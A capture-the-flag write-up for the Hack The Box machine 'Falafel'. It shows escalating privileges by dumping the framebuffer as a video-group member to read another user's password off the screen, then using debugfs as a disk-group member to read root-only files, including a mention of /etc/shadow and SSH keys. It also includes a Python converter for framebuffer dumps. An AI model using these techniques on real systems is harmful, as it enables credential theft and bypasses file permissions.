HTB Falafel privilege escalation writeup

June 24, 2018

User moshe is in the video group

$ id
uid=1001(moshe) gid=1001(moshe) groups=1001(moshe),4(adm),8(mail),9(news),22(voice),25(floppy),29(audio),44(video),60(games)

The framebuffer device (/dev/fb0) is owned by group video, so any member can read the raw contents of the console, i.e. whatever is on the screen right now

$ ls -lah /dev/fb0
crw-rw---- 1 root video 29, 0 Jun 24 09:32 /dev/fb0

Dump the framebuffer to a file

$ cat /dev/fb0 > .ayamkambing

Transfer the dump to your machine and find a way to convert the raw framebuffer to an image. You will need the target's resolution and colour depth for that; both are world-readable on the target in /sys/class/graphics/fb0/virtual_size and /sys/class/graphics/fb0/bits_per_pixel.

I used fb2png for this.

That tool only takes /dev/fb0 as input, so I copied the dump to my own framebuffer first

$ cat ../.ayamkambing > /dev/fb0
$ ./fb2png
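Writing the dump into your own /dev/fb0 only gives a sane picture when your framebuffer has the same resolution and pixel format as the target's. As an added example (not the writeup's tooling and not part of fb2png), the script below converts the raw dump straight to a PPM image using the target's geometry instead, so nothing has to match on your side. It assumes the usual little-endian XRGB8888 layout for 32 bpp dumps (bytes B, G, R, X per pixel) and RGB565 for 16 bpp; the width, height and depth come from the target's /sys/class/graphics/fb0 attributes, and the 4x2 sample dump is constructed for illustration.

```python
"""Convert a raw Linux framebuffer dump (cat /dev/fb0 > file) to a PPM image.

Added example, not the writeup's own tooling. Assumptions: 32 bpp dumps use the
usual little-endian XRGB8888 layout (bytes B, G, R, X per pixel) and 16 bpp dumps
use RGB565; width/height/depth are read from the *target's* sysfs, not yours.
"""
import struct
import sys


def fb_geometry(sysfs_dir="/sys/class/graphics/fb0"):
    """Return (width, height, bits_per_pixel) for a framebuffer.

    Run this on the machine you dumped from; the sysfs attributes are
    world-readable, so no group membership is needed for this part.
    """
    with open(f"{sysfs_dir}/virtual_size") as f:
        width, height = (int(v) for v in f.read().strip().split(","))
    with open(f"{sysfs_dir}/bits_per_pixel") as f:
        bpp = int(f.read().strip())
    return width, height, bpp


def fb_to_ppm(raw, width, height, bpp=32, stride=None):
    """Convert raw framebuffer bytes to a binary PPM (P6) image.

    stride is the number of bytes per scanline (the fb driver's line_length);
    it defaults to width * bytes-per-pixel, i.e. no row padding. Trailing bytes
    beyond the visible area are ignored; a dump that is too short raises.
    """
    if bpp not in (16, 32):
        raise ValueError(f"unsupported depth: {bpp} bpp")
    bytes_per_px = bpp // 8
    row = width * bytes_per_px
    stride = row if stride is None else stride
    needed = stride * (height - 1) + row
    if len(raw) < needed:
        raise ValueError(f"dump is {len(raw)} bytes, need {needed} for {width}x{height}@{bpp}bpp")
    if stride != row:
        # Drop per-row padding so the buffer is tightly packed.
        raw = b"".join(raw[y * stride:y * stride + row] for y in range(height))
    npix = width * height
    pixels = bytearray(npix * 3)  # RGB triplets, as PPM wants them
    if bpp == 32:
        # XRGB8888 in memory is B, G, R, X; pick each channel with a strided slice.
        raw = raw[:npix * 4]
        pixels[0::3] = raw[2::4]  # R
        pixels[1::3] = raw[1::4]  # G
        pixels[2::3] = raw[0::4]  # B
    else:
        # RGB565 (rrrrrggg gggbbbbb, little-endian); expand each channel to 8 bits.
        for i in range(npix):
            (px,) = struct.unpack_from("<H", raw, i * 2)
            r, g, b = (px >> 11) & 0x1F, (px >> 5) & 0x3F, px & 0x1F
            pixels[i * 3:i * 3 + 3] = bytes(((r << 3) | (r >> 2), (g << 2) | (g >> 4), (b << 3) | (b >> 2)))
    header = b"P6\n%d %d\n255\n" % (width, height)
    return header + bytes(pixels)


def sample_dump():
    """Constructed 4x2 XRGB8888 dump: red, green, blue, white on top; black below."""
    def px(r, g, b):
        return bytes((b, g, r, 0))  # memory order is B, G, R, X
    top = px(255, 0, 0) + px(0, 255, 0) + px(0, 0, 255) + px(255, 255, 255)
    return top + bytes(16)


if __name__ == "__main__":
    # usage: python3 fb2ppm.py dump.raw WIDTH HEIGHT [BPP] > screen.ppm
    path, w, h = sys.argv[1], int(sys.argv[2]), int(sys.argv[3])
    bpp = int(sys.argv[4]) if len(sys.argv) > 4 else 32
    with open(path, "rb") as f:
        sys.stdout.buffer.write(fb_to_ppm(f.read(), w, h, bpp))
```

Any image viewer (or ImageMagick's convert) opens the resulting PPM. If the picture comes out sheared, the target's line_length is larger than width * bytes-per-pixel; pass that value as stride.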

You'll get a screenshot of the target's current console, and user yossi's password is visible on it. Note that copying a dump into your own framebuffer only works when your /dev/fb0 has the same resolution and colour depth as the target's (compare /sys/class/graphics/fb0/virtual_size and bits_per_pixel on both machines), otherwise the image comes out sheared or garbled. Use su to switch to user yossi (or SSH in as yossi)

$ su - yossi
Password:
yossi@falafel:~$

Yossi is in the disk group

yossi@falafel:~$ id
uid=1000(yossi) gid=1000(yossi) groups=1000(yossi),4(adm),6(disk),24(cdrom),30(dip),46(plugdev),117(lpadmin),118(sambashare)

Initially I tried to dump the whole of /dev/sda1, but was greeted with a disk-full error. Thanks to https://unix.stackexchange.com/questions/90996/ls-on-device-without-mounting-it, I learnt that you can use debugfs to run commands against a raw ext filesystem without mounting it.

yossi@falafel:~$ /sbin/debugfs -R "cat /root/root.txt" /dev/sda1
debugfs 1.42.13 (17-May-2015)
23b7920*************f2091c001fa1

Yay!

Membership in the disk group is effectively root: debugfs walks the ext filesystem on the block device directly, so /etc/shadow, /root/.ssh/id_rsa or any other file can be read the same way regardless of its permissions, and with -w debugfs can write to the filesystem as well.